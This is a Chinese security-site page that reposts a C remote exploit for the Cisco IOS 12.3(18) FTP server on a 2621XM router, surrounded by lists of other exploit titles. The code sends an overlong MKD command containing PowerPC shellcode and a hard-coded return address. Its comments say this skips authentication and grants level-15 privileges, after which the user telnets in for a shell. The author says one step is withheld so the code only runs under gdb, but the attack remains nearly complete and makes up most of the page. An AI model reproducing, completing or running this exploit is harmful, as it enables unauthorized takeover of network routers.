• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb) ,其中包含exploit,exploit是什么意思,exploit db,exploit开拓官网,exploit开拓工具等知识点,遇到此问题的同学们可以参考下
/* Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research

iosftpexploit <at> googlemail 'dot' com */ #include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h> #define PORT 21 int main(int argc, char **argv)
{
unsigned char sendbuf[] = "MKD " /* .equ vty_info, 0x8182da60 # pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */ "\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
"\x38\x84\xda\x60" /* la 4,vty_info@l(4) */
"\x7d\x08\x42\x78" /* xor 8,8,8 */
"\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */
"\x91\x07\x01\x74" /* stw 8,372(7) */
"\x39\x08\xff\xff" /* subi 8,8,1 */
"\x38\xe7\x09\x1a" /* addi 7,7,233 */
"\x91\x07\x04\xca" /* stw 8,1226(7) */
"\x7d\x03\x43\x78" /* mr 3,8 */
"\x3c\x80\x80\xe4" /* lis 4,terminate@ha */
"\x38\x84\x08\x6c" /* la 4,terminate@l(4) */
"\x7c\x89\x03\xa6" /* mtctr 4 */
"\x4e\x80\x04\x20" /* bctr */ /* exists cleanly without adversely affecting the FTP server */ "\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */ "\x80\x06\x23\xB8" /* return address */
"\x0d\x0a"; /* trampoline code */
/* when the overflow occurs r26 0x14 points to the shellcode */
/*
0x800623B8 lwz 26, 20(26)
0x800623BC mtctr 26
0x800623C0 mr 3, 27
0x800623C4 bctrl
*/ unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s; if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n"); printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit(-1);
} servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT); s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n"); if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
{
printf("Error sending packet...quitting\n\n");
exit (1);
}
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

</div>

您可能想查找下面的文章:

  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
  • WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

相关文章

  • EO Video 1.36 Local Heap Overflow DOS / PoC
  • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
  • MS Internet Explorer (FTP Server Response) DoS Exploit
  • Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
  • LoveCMS 1.6.2 Final Update Settings Remote Exploit
  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
  • BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
  • iGaming CMS
  • Galatolo Web Manager 1.3a

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
    • gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
    • MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
    • Simple PHP Blog (SPHPBlog)
    • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
    • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
    • Belkin wireless G router ADSL2 modem Auth Bypass Exploit
    • HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit
    • WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
    • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有